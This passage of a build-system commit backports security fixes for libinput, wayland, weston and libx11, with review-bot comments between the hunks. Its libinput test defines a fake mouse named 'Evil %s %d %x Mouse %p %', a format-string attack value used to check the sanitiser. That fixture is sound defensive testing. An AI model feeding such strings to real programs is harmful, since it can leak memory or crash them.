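++ * The above copyright notice and this permission notice (including the next
++ * paragraph) shall be included in all copies or substantial portions of the
++ * Software.
++ *
++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
++ * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
++ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
++ * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
++ * DEALINGS IN THE SOFTWARE.
++ */
++
++#include "config.h"
++
++#include "litest.h"
++#include "litest-int.h"
++
++static struct input_id input_id = {
++ .bustype = 0x3,
++ .vendor = 0x0123,
++ .product = 0x0456,
++};
++
++static int events[] = {
++ EV_KEY, BTN_LEFT,
++ EV_KEY, BTN_RIGHT,
++ EV_KEY, BTN_MIDDLE,
++ EV_REL, REL_X,
++ EV_REL, REL_Y,
++ EV_REL, REL_WHEEL,
++ EV_REL, REL_WHEEL_HI_RES,
++ -1 , -1,
++};
++
++TEST_DEVICE("mouse-format-string",
++ .type = LITEST_MOUSE_FORMAT_STRING,
++ .features = LITEST_RELATIVE | LITEST_BUTTON | LITEST_WHEEL,
++ .interface = NULL,
++
++ .name = "Evil %s %d %x Mouse %p %",
++ .id = &input_id,
++ .absinfo = NULL,
++ .events = events,
++)
+diff --git a/test/litest.h b/test/litest.h
+index 4982e516..1b1daa90 100644
+--- a/test/litest.h
++++ b/test/litest.h
+@@ -303,6 +303,7 @@
+ LITEST_ALPS_3FG,
+ LITEST_ELAN_TABLET,
+ LITEST_ABSINFO_OVERRIDE,
++ LITEST_MOUSE_FORMAT_STRING,
+ };
+
+ #define LITEST_DEVICELESS -2
+diff --git a/test/test-utils.c b/test/test-utils.c
+index 989adecd..e80754be 100644
+--- a/test/test-utils.c
++++ b/test/test-utils.c
+@@ -1267,6 +1267,31 @@ START_TEST(strstartswith_test)
+ }
+ END_TEST
+
++START_TEST(strsanitize_test)
++{
++ struct strsanitize_test {
++ const char *string;
++ const char *expected;
++ } tests[] = {
++ { "foobar", "foobar" },
++ { "", "" },
++ { "%", "%%" },
++ { "%%%%", "%%%%%%%%" },
++ { "x %s", "x %%s" },
++ { "x %", "x %%" },
++ { "%sx", "%%sx" },
++ { "%s%s", "%%s%%s" },
++ { NULL, NULL },
++ };
++
++ for (struct strsanitize_test *t = tests; t->string; t++) {
++ char *sanitized = str_sanitize(t->string);
++ ck_assert_str_eq(sanitized, t->expected);
++ free(sanitized);
++ }
++}
++END_TEST
++
+ START_TEST(list_test_insert)
+ {
+ struct list_test {
+@@ -1138,6 +1138,7 @@
+ tcase_add_test(tc, strsplit_test);
+ tcase_add_test(tc, kvsplit_double_test);
+ tcase_add_test(tc, strjoin_test);
++ tcase_add_test(tc, strsanitize_test);
+ tcase_add_test(tc, time_conversion);
+
+ tcase_add_test(tc, list_test_insert);
+
+--
+GitLab
+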
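Review bot: The patch header carries `Upstream Status: Backport [...]` without the hyphen, while the other patches added in this change use `Upstream-Status:`; tooling that looks for that tag may not recognise it, so the line should start with `Upstream-Status: Backport` and keep the same bracketed commit URL. In `str_sanitize`, names containing `%` are cut at 512 bytes while names without it are copied whole, and `strsanitize_test` covers neither the truncation nor the `NULL` input; a comment on the `min(strlen(str), 512)` line saying the cap is deliberate would help. `device->log_prefix_name` becomes `NULL` if `libevdev_get_name()` ever returns `NULL`, and it is then passed to `%s` in `evdev_log_msg`; whether that can happen is not visible in these hunks.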
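--- a/meta/recipes-graphics/wayland/libinput_1.15.2.bb
+++ b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
@@ -14,6 +14,7 @@ DEPENDS = "libevdev udev mtdev"
 
 SRC_URI = "http://www.freedesktop.org/software/${BPN}/${BP}.tar.xz \
  file://determinism.patch \
+ file://CVE-2022-1215.patch \
  "
 SRC_URI[md5sum] = "eb6bd2907ad33d53954d70dfb881a643"
 SRC_URI[sha256sum] = "971c3fbfb624f95c911adeb2803c372e4e3647d1b98f278f660051f834597747"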
diff --git a/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
new file mode 100644
index 0000000000..df204508e9
--- /dev/null
+++ b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
@@ -0,0 +1,111 @@
1From 5eed6609619cc2e4eaa8618d11c15d442abf54be Mon Sep 17 00:00:00 2001
2From: Derek Foreman <derek.foreman@collabora.com>
3Date: Fri, 28 Jan 2022 13:18:37 -0600
4Subject: [PATCH] util: Limit size of wl_map
5
6Since server IDs are basically indistinguishable from really big client
7IDs at many points in the source, it's theoretically possible to overflow
8a map and either overflow server IDs into the client ID space, or grow
9client IDs into the server ID space. This would currently take a massive
10amount of RAM, but the definition of massive changes yearly.
11
12Prevent this by placing a ridiculous but arbitrary upper bound on the
13number of items we can put in a map: 0xF00000, somewhere over 15 million.
14This should satisfy pathological clients without restriction, but stays
15well clear of the 0xFF000000 transition point between server and client
16IDs. It will still take an improbable amount of RAM to hit this, and a
17client could still exhaust all RAM in this way, but our goal is to prevent
18overflow and undefined behaviour.
19
20Fixes #224
21
22Signed-off-by: Derek Foreman <derek.foreman@collabora.com>
23
24Upstream-Status: Backport
25CVE: CVE-2021-3782
26
27Reference to upstream patch:
28https://gitlab.freedesktop.org/wayland/wayland/-/commit/b19488c7154b902354cb26a27f11415d7799b0b2
29
30[DP: adjust context for wayland version 1.20.0]
31Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
32---
33 src/wayland-private.h | 1 +
34 src/wayland-util.c | 25 +++++++++++++++++++++++--
35 2 files changed, 24 insertions(+), 2 deletions(-)
36
37diff --git a/src/wayland-private.h b/src/wayland-private.h
38index 9bf8cb7..35dc40e 100644
39--- a/src/wayland-private.h
40+++ b/src/wayland-private.h
41@@ -45,6 +45,7 @@
42 #define WL_MAP_SERVER_SIDE 0
43 #define WL_MAP_CLIENT_SIDE 1
44 #define WL_SERVER_ID_START 0xff000000
45+#define WL_MAP_MAX_OBJECTS 0x00f00000
46 #define WL_CLOSURE_MAX_ARGS 20
47
48 struct wl_object {
49diff --git a/src/wayland-util.c b/src/wayland-util.c
50index d5973bf..3e45d19 100644
51--- a/src/wayland-util.c
52+++ b/src/wayland-util.c
53@@ -195,6 +195,7 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
54 union map_entry *start, *entry;
55 struct wl_array *entries;
56 uint32_t base;
57+ uint32_t count;
58
59 if (map->side == WL_MAP_CLIENT_SIDE) {
60 entries = &map->client_entries;
61@@ -215,10 +216,25 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
62 start = entries->data;
63 }
64
65+ /* wl_array only grows, so if we have too many objects at
66+ * this point there's no way to clean up. We could be more
67+ * pro-active about trying to avoid this allocation, but
68+ * it doesn't really matter because at this point there is
69+ * nothing to be done but disconnect the client and delete
70+ * the whole array either way.
71+ */
72+ count = entry - start;
73+ if (count > WL_MAP_MAX_OBJECTS) {
74+ /* entry->data is freshly malloced garbage, so we'd
75+ * better make it a NULL so wl_map_for_each doesn't
76+ * dereference it later. */
77+ entry->data = NULL;
78+ return 0;
79+ }
80 entry->data = data;
81 entry->next |= (flags & 0x1) << 1;
82
83- return (entry - start) + base;
84+ return count + base;
85 }
86
87 int
88@@ -235,6 +251,9 @@ wl_map_insert_at(struct wl_map *map, uint32_t flags, uint32_t i, void *data)
89 i -= WL_SERVER_ID_START;
90 }
91
92+ if (i > WL_MAP_MAX_OBJECTS)
93+ return -1;
94+
95 count = entries->size / sizeof *start;
96 if (count < i)
97 return -1;
98@@ -269,8 +288,10 @@ wl_map_reserve_new(struct wl_map *map, uint32_t i)
99 i -= WL_SERVER_ID_START;
100 }
101
102- count = entries->size / sizeof *start;
103+ if (i > WL_MAP_MAX_OBJECTS)
104+ return -1;
105
106+ count = entries->size / sizeof *start;
107 if (count < i)
108 return -1;
109
110--
1112.37.3
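Review bot: The backport note in the patch header reads `[DP: adjust context for wayland version 1.20.0]`, but the recipe that applies this patch in the same commit is wayland_1.18.0.bb. It is worth confirming that the hunks were checked against 1.18.0 and correcting the note, for example `[DP: adjust context for wayland version 1.18.0]`. In wl_map_insert_new() the new limit is reported with `return 0;`, so every caller has to treat 0 as "no ID allocated"; the callers are outside these hunks and cannot be checked from here. A comment above the function such as `/* Returns the new ID, or 0 once the map has grown past WL_MAP_MAX_OBJECTS. */` would record that contract.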
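--- a/meta/recipes-graphics/wayland/wayland_1.18.0.bb
+++ b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
@@ -18,6 +18,7 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
  file://0002-Do-not-hardcode-the-path-to-wayland-scanner.patch \
  file://0001-build-Fix-strndup-detection-on-MinGW.patch \
  file://0001-meson-tests-add-missing-dependencies-on-protocol-hea.patch \
+ file://CVE-2021-3782.patch \
  "
 SRC_URI[md5sum] = "23317697b6e3ff2e1ac8c5ba3ed57b65"
 SRC_URI[sha256sum] = "4675a79f091020817a98fd0484e7208c8762242266967f55a67776936c2e294d"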
diff --git a/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
new file mode 100644
index 0000000000..fb36d3817a
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
@@ -0,0 +1,32 @@
1From 5c74a0640e873694bf60a88eceb21f664cb4b8f7 Mon Sep 17 00:00:00 2001
2From: Marius Vlad <marius.vlad@collabora.com>
3Date: Fri, 5 Mar 2021 20:03:49 +0200
4Subject: [PATCH 2/5] desktop-shell: Remove no-op de-activation of the xdg
5 top-level surface
6
7The shsurf is calloc'ed so the surface count is always 0. Not only
8that but the surface is not set as active by default, so there's no
9need to de-activate it.
10
11Upstream-Status: Backport [05bef4c18a3e82376a46a4a28d978389c4c0fd0f]
12Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
13---
14 desktop-shell/shell.c | 2 --
15 1 file changed, 2 deletions(-)
16
17diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
18index 442a625f..3791be25 100644
19--- a/desktop-shell/shell.c
20+++ b/desktop-shell/shell.c
21@@ -2427,8 +2427,6 @@ desktop_surface_added(struct weston_desktop_surface *desktop_surface,
22 wl_list_init(&shsurf->children_link);
23
24 weston_desktop_surface_set_user_data(desktop_surface, shsurf);
25- weston_desktop_surface_set_activated(desktop_surface,
26- shsurf->focus_count > 0);
27 }
28
29 static void
30--
312.34.1
32
diff --git a/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
new file mode 100644
index 0000000000..dcd0700fca
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
@@ -0,0 +1,57 @@
1From edb31c456ae3da7ffffefb668a37ab88075c4b67 Mon Sep 17 00:00:00 2001
2From: Marius Vlad <marius.vlad@collabora.com>
3Date: Fri, 5 Mar 2021 21:40:22 +0200
4Subject: [PATCH 3/5] desktop-shell: Rename gain/lose keyboard focus to
5 activate/de-activate
6
7This way it better reflects that it handles activation rather that input
8focus.
9
10Upstream-Status: Backport [ab39e1d76d4f6715cb300bc37f5c2a0e2d426208]
11Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
12---
13 desktop-shell/shell.c | 8 ++++----
14 1 file changed, 4 insertions(+), 4 deletions(-)
15
16diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
17index 3791be25..c4669f11 100644
18--- a/desktop-shell/shell.c
19+++ b/desktop-shell/shell.c
20@@ -1869,14 +1869,14 @@ handle_pointer_focus(struct wl_listener *listener, void *data)
21 }
22
23 static void
24-shell_surface_lose_keyboard_focus(struct shell_surface *shsurf)
25+shell_surface_deactivate(struct shell_surface *shsurf)
26 {
27 if (--shsurf->focus_count == 0)
28 weston_desktop_surface_set_activated(shsurf->desktop_surface, false);
29 }
30
31 static void
32-shell_surface_gain_keyboard_focus(struct shell_surface *shsurf)
33+shell_surface_activate(struct shell_surface *shsurf)
34 {
35 if (shsurf->focus_count++ == 0)
36 weston_desktop_surface_set_activated(shsurf->desktop_surface, true);
37@@ -1891,7 +1891,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
38 if (seat->focused_surface) {
39 struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
40 if (shsurf)
41- shell_surface_lose_keyboard_focus(shsurf);
42+ shell_surface_deactivate(shsurf);
43 }
44
45 seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
46@@ -1899,7 +1899,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
47 if (seat->focused_surface) {
48 struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
49 if (shsurf)
50- shell_surface_gain_keyboard_focus(shsurf);
51+ shell_surface_activate(shsurf);
52 }
53 }
54
55--
562.34.1
57
diff --git a/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
new file mode 100644
index 0000000000..7ca72f8494
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
@@ -0,0 +1,99 @@
1From 899ad5a6a8a92f2c10e0694a45c982b7d878aed6 Mon Sep 17 00:00:00 2001
2From: Marius Vlad <marius.vlad@collabora.com>
3Date: Fri, 5 Mar 2021 21:44:26 +0200
4Subject: [PATCH 4/5] desktop-shell: Embed keyboard focus handle code when
5 activating
6
7We shouldn't be constrained by having a keyboard plugged-in, so avoid
8activating/de-activating the window/surface in the keyboard focus
9handler and embed it straight into the window activation part.
10
11Upstream-Status: Backport [f12697bb3e4c6eb85437ed905e7de44ae2a0ba69]
12Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
13---
14 desktop-shell/shell.c | 41 +++++++++++++++++++++++++----------------
15 1 file changed, 25 insertions(+), 16 deletions(-)
16
17diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
18index c4669f11..c6a4fe91 100644
19--- a/desktop-shell/shell.c
20+++ b/desktop-shell/shell.c
21@@ -1885,22 +1885,7 @@ shell_surface_activate(struct shell_surface *shsurf)
22 static void
23 handle_keyboard_focus(struct wl_listener *listener, void *data)
24 {
25- struct weston_keyboard *keyboard = data;
26- struct shell_seat *seat = get_shell_seat(keyboard->seat);
27-
28- if (seat->focused_surface) {
29- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
30- if (shsurf)
31- shell_surface_deactivate(shsurf);
32- }
33-
34- seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
35-
36- if (seat->focused_surface) {
37- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
38- if (shsurf)
39- shell_surface_activate(shsurf);
40- }
41+ /* FIXME: To be removed later. */
42 }
43
44 /* The surface will be inserted into the list immediately after the link
45@@ -2438,6 +2423,7 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
46 struct shell_surface *shsurf_child, *tmp;
47 struct weston_surface *surface =
48 weston_desktop_surface_get_surface(desktop_surface);
49+ struct weston_seat *seat;
50
51 if (!shsurf)
52 return;
53@@ -2448,6 +2434,18 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
54 }
55 wl_list_remove(&shsurf->children_link);
56
57+ wl_list_for_each(seat, &shsurf->shell->compositor->seat_list, link) {
58+ struct shell_seat *shseat = get_shell_seat(seat);
59+ /* activate() controls the focused surface activation and
60+ * removal of a surface requires invalidating the
61+ * focused_surface to avoid activate() use a stale (and just
62+ * removed) surface when attempting to de-activate it. It will
63+ * also update the focused_surface once it has a chance to run.
64+ */
65+ if (surface == shseat->focused_surface)
66+ shseat->focused_surface = NULL;
67+ }
68+
69 wl_signal_emit(&shsurf->destroy_signal, shsurf);
70
71 if (shsurf->fullscreen.black_view)
72@@ -3836,6 +3834,7 @@ activate(struct desktop_shell *shell, struct weston_view *view,
73 struct workspace *ws;
74 struct weston_surface *old_es;
75 struct shell_surface *shsurf, *shsurf_child;
76+ struct shell_seat *shseat = get_shell_seat(seat);
77
78 main_surface = weston_surface_get_main_surface(es);
79 shsurf = get_shell_surface(main_surface);
80@@ -3855,6 +3854,16 @@ activate(struct desktop_shell *shell, struct weston_view *view,
81
82 weston_view_activate(view, seat, flags);
83
84+ if (shseat->focused_surface) {
85+ struct shell_surface *current_focus =
86+ get_shell_surface(shseat->focused_surface);
87+ assert(current_focus);
88+ shell_surface_deactivate(current_focus);
89+ }
90+
91+ shseat->focused_surface = main_surface;
92+ shell_surface_activate(shsurf);
93+
94 state = ensure_focus_state(shell, seat);
95 if (state == NULL)
96 return;
97--
982.34.1
99
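Review bot: In activate(), `assert(current_focus);` replaces the `if (shsurf)` guard that the removed handle_keyboard_focus() body placed around the same get_shell_surface() lookup. A focused_surface without a shell surface now aborts the compositor, and in an NDEBUG build it would reach `--shsurf->focus_count` in shell_surface_deactivate() through a NULL pointer. Unless code outside these hunks guarantees the lookup cannot fail, keeping the guard is the safer form: `if (current_focus) shell_surface_deactivate(current_focus);`. The added `shell_surface_activate(shsurf);` relies in the same way on `shsurf` from get_shell_surface(main_surface); any NULL check on it lies between the two activate() hunks and is not visible here.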
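--- a/meta/recipes-graphics/wayland/weston_8.0.0.bb
+++ b/meta/recipes-graphics/wayland/weston_8.0.0.bb
@@ -10,6 +10,9 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
  file://weston.desktop \
  file://xwayland.weston-start \
  file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \
+ file://0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch \
+ file://0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch \
+ file://0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch \
 "
 SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3"
 SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848"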
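--- a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
+++ b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Touchscreen calibration data from xinput-calibrator"
+DESCRIPTION = "A generic touchscreen calibration program for X.Org"
+HOMEPAGE = "https://www.freedesktop.org/wiki/Software/xinput_calibrator/"
+BUGTRACKER = "https://github.com/tias/xinput_calibrator/issues"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
 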
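--- a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
+++ b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
@@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check
 REQUIRED_DISTRO_FEATURES = "x11"
 
 SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46"
-SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \
+SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \
  file://30xinput_calibrate.sh \
  file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \
  file://0001-calibrator.hh-Include-string-to-get-std-string.patch \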
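--- a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
+++ b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
@@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf"
 PV = "2.99.917+git${SRCPV}"
 S = "${WORKDIR}/git"
 
-SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel"
+SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master"
 
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)"
 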
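Review bot: The updated SRC_URI still fetches over the plain `git://` transport, which offers no transport authentication or encryption, so only the pinned SRCREV protects the fetched content. The xinput-calibrator recipe changed in this same commit adds `;protocol=https` to its SRC_URI. If anongit.freedesktop.org serves this repository over HTTPS, the same parameter could be appended here: `git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master;protocol=https`.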
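--- a/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
+++ b/meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb
@@ -14,8 +14,6 @@ SOURCE_DATE_EPOCH = "1613559011"
 
 PE = "1"
 PR = "r3"
-HASHEQUIV_HASH_VERSION .= ".1"
-
 
 inherit allarch features_check
 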
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
new file mode 100644
index 0000000000..97c4c17a8a
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch
@@ -0,0 +1,333 @@
1From 5c539ee6aba5872fcc73aa3d46a4e9a33dc030db Mon Sep 17 00:00:00 2001
2From: Matthieu Herrb <matthieu@herrb.eu>
3Date: Fri, 19 Feb 2021 15:30:39 +0100
4Subject: [PATCH] Reject string longer than USHRT_MAX before sending them on
5 the wire
6
7The X protocol uses CARD16 values to represent the length so
8this would overflow.
9
10CVE-2021-31535
11
12Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
13
14https://lists.x.org/archives/xorg-announce/2021-May/003088.html
15
16XLookupColor() and other X libraries function lack proper validation
17of the length of their string parameters. If those parameters can be
18controlled by an external application (for instance a color name that
19can be emitted via a terminal control sequence) it can lead to the
20emission of extra X protocol requests to the X server.
21
22Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/8d2e02ae650f00c4a53deb625211a0527126c605]
23CVE: CVE-2021-31535
24Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
25---
26 src/Font.c | 6 ++++--
27 src/FontInfo.c | 3 +++
28 src/FontNames.c | 3 +++
29 src/GetColor.c | 4 ++++
30 src/LoadFont.c | 4 ++++
31 src/LookupCol.c | 6 ++++--
32 src/ParseCol.c | 5 ++++-
33 src/QuExt.c | 5 +++++
34 src/SetFPath.c | 8 +++++++-
35 src/SetHints.c | 7 +++++++
36 src/StNColor.c | 3 +++
37 src/StName.c | 7 ++++++-
38 12 files changed, 54 insertions(+), 7 deletions(-)
39
40diff --git a/src/Font.c b/src/Font.c
41index 09d2ae91..3f468e4b 100644
42--- a/src/Font.c
43+++ b/src/Font.c
44@@ -102,6 +102,8 @@ XFontStruct *XLoadQueryFont(
45 XF86BigfontCodes *extcodes = _XF86BigfontCodes(dpy);
46 #endif
47
48+ if (strlen(name) >= USHRT_MAX)
49+ return NULL;
50 if (_XF86LoadQueryLocaleFont(dpy, name, &font_result, (Font *)0))
51 return font_result;
52 LockDisplay(dpy);
53@@ -662,8 +664,8 @@ int _XF86LoadQueryLocaleFont(
54
55 if (!name)
56 return 0;
57- l = strlen(name);
58- if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-')
59+ l = (int) strlen(name);
60+ if (l < 2 || name[l - 1] != '*' || name[l - 2] != '-' || l >= USHRT_MAX)
61 return 0;
62 charset = NULL;
63 /* next three lines stolen from _XkbGetCharset() */
64diff --git a/src/FontInfo.c b/src/FontInfo.c
65index f870e431..51b48e29 100644
66--- a/src/FontInfo.c
67+++ b/src/FontInfo.c
68@@ -58,6 +58,9 @@ XFontStruct **info) /* RETURN */
69 register xListFontsReq *req;
70 int j;
71
72+ if (strlen(pattern) >= USHRT_MAX)
73+ return NULL;
74+
75 LockDisplay(dpy);
76 GetReq(ListFontsWithInfo, req);
77 req->maxNames = maxNames;
78diff --git a/src/FontNames.c b/src/FontNames.c
79index b78792d6..4dac4916 100644
80--- a/src/FontNames.c
81+++ b/src/FontNames.c
82@@ -51,6 +51,9 @@ int *actualCount) /* RETURN */
83 register xListFontsReq *req;
84 unsigned long rlen = 0;
85
86+ if (strlen(pattern) >= USHRT_MAX)
87+ return NULL;
88+
89 LockDisplay(dpy);
90 GetReq(ListFonts, req);
91 req->maxNames = maxNames;
92diff --git a/src/GetColor.c b/src/GetColor.c
93index cd0eb9f6..512ac308 100644
94--- a/src/GetColor.c
95+++ b/src/GetColor.c
96@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
97 #ifdef HAVE_CONFIG_H
98 #include <config.h>
99 #endif
100+#include <limits.h>
101 #include <stdio.h>
102 #include "Xlibint.h"
103 #include "Xcmsint.h"
104@@ -48,6 +49,9 @@ XColor *exact_def) /* RETURN */
105 XcmsColor cmsColor_exact;
106 Status ret;
107
108+ if (strlen(colorname) >= USHRT_MAX)
109+ return (0);
110+
111 #ifdef XCMS
112 /*
113 * Let's Attempt to use Xcms and i18n approach to Parse Color
114diff --git a/src/LoadFont.c b/src/LoadFont.c
115index f547976b..85735249 100644
116--- a/src/LoadFont.c
117+++ b/src/LoadFont.c
118@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
119 #ifdef HAVE_CONFIG_H
120 #include <config.h>
121 #endif
122+#include <limits.h>
123 #include "Xlibint.h"
124
125 Font
126@@ -38,6 +39,9 @@ XLoadFont (
127 Font fid;
128 register xOpenFontReq *req;
129
130+ if (strlen(name) >= USHRT_MAX)
131+ return (0);
132+
133 if (_XF86LoadQueryLocaleFont(dpy, name, (XFontStruct **)0, &fid))
134 return fid;
135
136diff --git a/src/LookupCol.c b/src/LookupCol.c
137index f7f969f5..cd9b1368 100644
138--- a/src/LookupCol.c
139+++ b/src/LookupCol.c
140@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
141 #ifdef HAVE_CONFIG_H
142 #include <config.h>
143 #endif
144+#include <limits.h>
145 #include <stdio.h>
146 #include "Xlibint.h"
147 #include "Xcmsint.h"
148@@ -46,6 +47,9 @@ XLookupColor (
149 XcmsCCC ccc;
150 XcmsColor cmsColor_exact;
151
152+ n = (int) strlen (spec);
153+ if (n >= USHRT_MAX)
154+ return 0;
155 #ifdef XCMS
156 /*
157 * Let's Attempt to use Xcms and i18n approach to Parse Color
158@@ -77,8 +81,6 @@ XLookupColor (
159 * Xcms and i18n methods failed, so lets pass it to the server
160 * for parsing.
161 */
162-
163- n = strlen (spec);
164 LockDisplay(dpy);
165 GetReq (LookupColor, req);
166 req->cmap = cmap;
167diff --git a/src/ParseCol.c b/src/ParseCol.c
168index e997b1b8..180132dd 100644
169--- a/src/ParseCol.c
170+++ b/src/ParseCol.c
171@@ -27,6 +27,7 @@ in this Software without prior written authorization from The Open Group.
172 #ifdef HAVE_CONFIG_H
173 #include <config.h>
174 #endif
175+#include <limits.h>
176 #include <stdio.h>
177 #include "Xlibint.h"
178 #include "Xcmsint.h"
179@@ -46,7 +47,9 @@ XParseColor (
180 XcmsColor cmsColor;
181
182 if (!spec) return(0);
183- n = strlen (spec);
184+ n = (int) strlen (spec);
185+ if (n >= USHRT_MAX)
186+ return(0);
187 if (*spec == '#') {
188 /*
189 * RGB
190diff --git a/src/QuExt.c b/src/QuExt.c
191index 4e230e77..d38a1572 100644
192--- a/src/QuExt.c
193+++ b/src/QuExt.c
194@@ -27,6 +27,8 @@ in this Software without prior written authorization from The Open Group.
195 #ifdef HAVE_CONFIG_H
196 #include <config.h>
197 #endif
198+#include <limits.h>
199+#include <stdbool.h>
200 #include "Xlibint.h"
201
202 Bool
203@@ -40,6 +42,9 @@ XQueryExtension(
204 xQueryExtensionReply rep;
205 register xQueryExtensionReq *req;
206
207+ if (strlen(name) >= USHRT_MAX)
208+ return false;
209+
210 LockDisplay(dpy);
211 GetReq(QueryExtension, req);
212 req->nbytes = name ? strlen(name) : 0;
213diff --git a/src/SetFPath.c b/src/SetFPath.c
214index 60aaef01..3d8c50cb 100644
215--- a/src/SetFPath.c
216+++ b/src/SetFPath.c
217@@ -26,6 +26,7 @@ in this Software without prior written authorization from The Open Group.
218
219 #ifdef HAVE_CONFIG_H
220 #include <config.h>
221+#include <limits.h>
222 #endif
223 #include "Xlibint.h"
224
225@@ -48,7 +49,12 @@ XSetFontPath (
226 GetReq (SetFontPath, req);
227 req->nFonts = ndirs;
228 for (i = 0; i < ndirs; i++) {
229- n += safestrlen (directories[i]) + 1;
230+ n = (int) ((size_t) n + (safestrlen (directories[i]) + 1));
231+ if (n >= USHRT_MAX) {
232+ UnlockDisplay(dpy);
233+ SyncHandle();
234+ return 0;
235+ }
236 }
237 nbytes = (n + 3) & ~3;
238 req->length += nbytes >> 2;
239diff --git a/src/SetHints.c b/src/SetHints.c
240index bc46498a..f3d727ec 100644
241--- a/src/SetHints.c
242+++ b/src/SetHints.c
243@@ -49,6 +49,7 @@ SOFTWARE.
244 #ifdef HAVE_CONFIG_H
245 #include <config.h>
246 #endif
247+#include <limits.h>
248 #include <X11/Xlibint.h>
249 #include <X11/Xutil.h>
250 #include "Xatomtype.h"
251@@ -214,6 +215,8 @@ XSetCommand (
252 register char *buf, *bp;
253 for (i = 0, nbytes = 0; i < argc; i++) {
254 nbytes += safestrlen(argv[i]) + 1;
255+ if (nbytes >= USHRT_MAX)
256+ return 1;
257 }
